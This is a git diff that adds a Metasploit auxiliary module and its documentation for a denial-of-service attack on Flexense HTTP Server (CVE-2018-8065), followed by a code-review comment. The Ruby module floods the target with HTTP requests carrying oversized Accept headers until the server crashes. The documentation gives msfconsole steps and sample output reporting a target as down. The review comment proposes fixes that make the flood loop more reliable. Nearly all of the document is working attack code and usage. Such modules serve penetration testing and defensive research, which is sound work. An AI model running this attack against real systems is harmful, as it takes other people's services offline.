diff --git a/documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md b/documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md
new file mode 100644
index 0000000000..d930453a26
--- /dev/null
+++ b/documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md
@@ -0,0 +1,67 @@
+## Description
+This module triggers a Denial of Service vulnerability in the Flexense Enterprise HTTP server. It is possible to trigger
+a write access memory vialation via rapidly sending HTTP requests with large HTTP header values.
+
+
+## Vulnerable Application
+According To publicly exploit Disclosure of Flexense HTTP Server v10.6.24
+Following list of softwares are vulnerable to Denial Of Service.
+read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065
+
+
+DiskBoss Enterprise <= v9.0.18
+Sync Breeze Enterprise <= v10.6.24
+Disk Pulse Enterprise <= v10.6.24
+Disk Savvy Enterprise <= v10.6.24
+Dup Scout Enterprise <= v10.6.24
+VX Search Enterprise <= v10.6.24
+
+
+**Vulnerable Application Link**
+http://www.diskboss.com/downloads.html
+http://www.syncbreeze.com/downloads.html
+http://www.diskpulse.com/downloads.html
+http://www.disksavvy.com/downloads.html
+http://www.dupscout.com/downloads.html
+
+
+## Vulnerable Application Installation Setup.
+All Flexense applications that are listed above can be installed by following these steps.
+
+Download Application : ```https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS/raw/master/syncbreezeent_setup_v10.6.24.exe```
+
+**And Follow Sync Breeze Enterprise v10.6.24 Setup Wizard**
+
+After the installation navigate to: ```Options->Server```
+
+Check the box saying: ```Enable web server on port:...```
+
+## Verification Steps
+
+ 1. Install the application
+ 2. Start msfconsole
+ 3. Do: `use auxiliary/dos/http/flexense_http_server_dos`
+ 4. Do: `set rport `
+ 5. Do: `set rhost `
+ 6. Do: `check`
+```
+[+] 192.168.1.20:80 The target is vulnerable.
+```
+ 7. Do: `run`
+ 8. Web server will crash after 200-1000 request depending on the OS version and system memory.
+
+## Scenarios
+**TESTED AGAINST WINDOWS 7/10**
+```
+msf5 > use auxiliary/dos/http/flexense_http_server_dos
+msf5 auxiliary(dos/http/flexense_http_server_dos) > set rhost 192.168.1.27
+rhost => 192.168.1.27
+msf5 auxiliary(dos/http/flexense_http_server_dos) > set rport 80
+rport => 80
+msf5 auxiliary(dos/http/flexense_http_server_dos) > run
+
+[*] 192.168.1.20:80 - Triggering the vulnerability
+[+] 192.168.1.20:80 - DoS successful 192.168.1.20 is down !
+[*] Auxiliary module execution completed
+
+```
diff --git a/modules/auxiliary/dos/http/flexense_http_server_dos.rb b/modules/auxiliary/dos/http/flexense_http_server_dos.rb
new file mode 100644
index 0000000000..dd77806d27
--- /dev/null
+++ b/modules/auxiliary/dos/http/flexense_http_server_dos.rb
@@ -0,0 +1,91 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+include Msf::Auxiliary::Dos
+include Msf::Exploit::Remote::Tcp
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Flexense HTTP Server Denial Of Service',
+'Description' => %q{
+This module triggers a Denial of Service vulnerability in the Flexense HTTP server.
+Vulnerability caused by a user mode write access memory violation and can be triggered with
+rapidly sending variety of HTTP requests with long HTTP header values.
+
+Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable.
+},
+'Author' => [ 'Ege Balci ' ],
+'License' => MSF_LICENSE,
+'References' =>
+[
+[ 'CVE', '2018-8065'],
+[ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ],
+],
+'DisclosureDate' => 'Mar 09 2018'))
+
+register_options(
+[
+Opt::RPORT(80),
+OptString.new('PacketCount', [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]),
+OptString.new('PacketSize', [ true, "The number of bytes in the Accept header (Recommended: 4088-5090" , rand(4088..5090) ])
+])
+
+end
+
+def check
+begin
+connect
+sock.put("GET / HTTP/1.0\r\n\r\n")
+res = sock.get
+if res and res.include? 'Flexense HTTP Server v10.6.24'
+Exploit::CheckCode::Appears
+else
+Exploit::CheckCode::Safe
+end
+rescue Rex::ConnectionRefused
+print_error("Target refused the connection")
+Exploit::CheckCode::Unknown
+rescue
+print_error("Target did not respond to HTTP request")
+Exploit::CheckCode::Unknown
+end
+end
+
+def run
+unless check == Exploit::CheckCode::Appears
+fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+end
+
+size = datastore['PacketSize'].to_i
+print_status("Starting with packets of #{size}-byte strings")
+
+count = 0
+loop do
+payload = ""
+payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n"
+payload << "Host: 127.0.0.1\r\n"
+payload << "Accept: "+('A' * size)+"\r\n"
+payload << "\r\n\r\n"
+begin
+connect
+sock.put(payload)
+disconnect
+count += 1
+break if count==datastore['PacketCount']
+rescue ::Rex::InvalidDestination
+print_error('Invalid destination! Continuing...')
+rescue ::Rex::ConnectionTimeout
+print_error('Connection timeout! Continuing...')
+rescue ::Errno::ECONNRESET
+print_error('Connection reset! Continuing...')
+rescue ::Rex::ConnectionRefused
+print_good("DoS successful after #{count} packets with #{size}-byte headers")
+return true
+end
+end
+print_error("DoS failed after #{count} packets of #{size}-byte strings")
+end
+end
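Review bot: The `break if count==datastore['PacketCount']` line in `run` compares the Integer `count` with the option value, and because `PacketCount` is registered as an `OptString` that value is a String at least whenever the user sets it, so the comparison is always false and the loop never stops at the configured packet bound, ending only when the target refuses a connection. Register it as `OptInt.new('PacketCount', [ true, "The number of packets to be sent (Recommended: Above 1725)", 1725 ])`, or at minimum write `break if count == datastore['PacketCount'].to_i`, matching the `.to_i` the code already applies to `PacketSize`. Separately, `check` returns `Safe` unless the banner contains exactly `'Flexense HTTP Server v10.6.24'`, while the module description states that versions below 10.6.24 are also affected, so such targets are reported as not vulnerable and `run` then refuses them; a comment such as `# Only the exact v10.6.24 banner is fingerprinted; older builds report Safe` above the `if` would make that scope explicit to operators. Also, `disconnect` sits inside the `begin` body, so a `::Errno::ECONNRESET` or `::Rex::ConnectionTimeout` raised after `connect` leaves that socket open for the rest of the loop; moving it to `ensure disconnect if sock` closes it on every path.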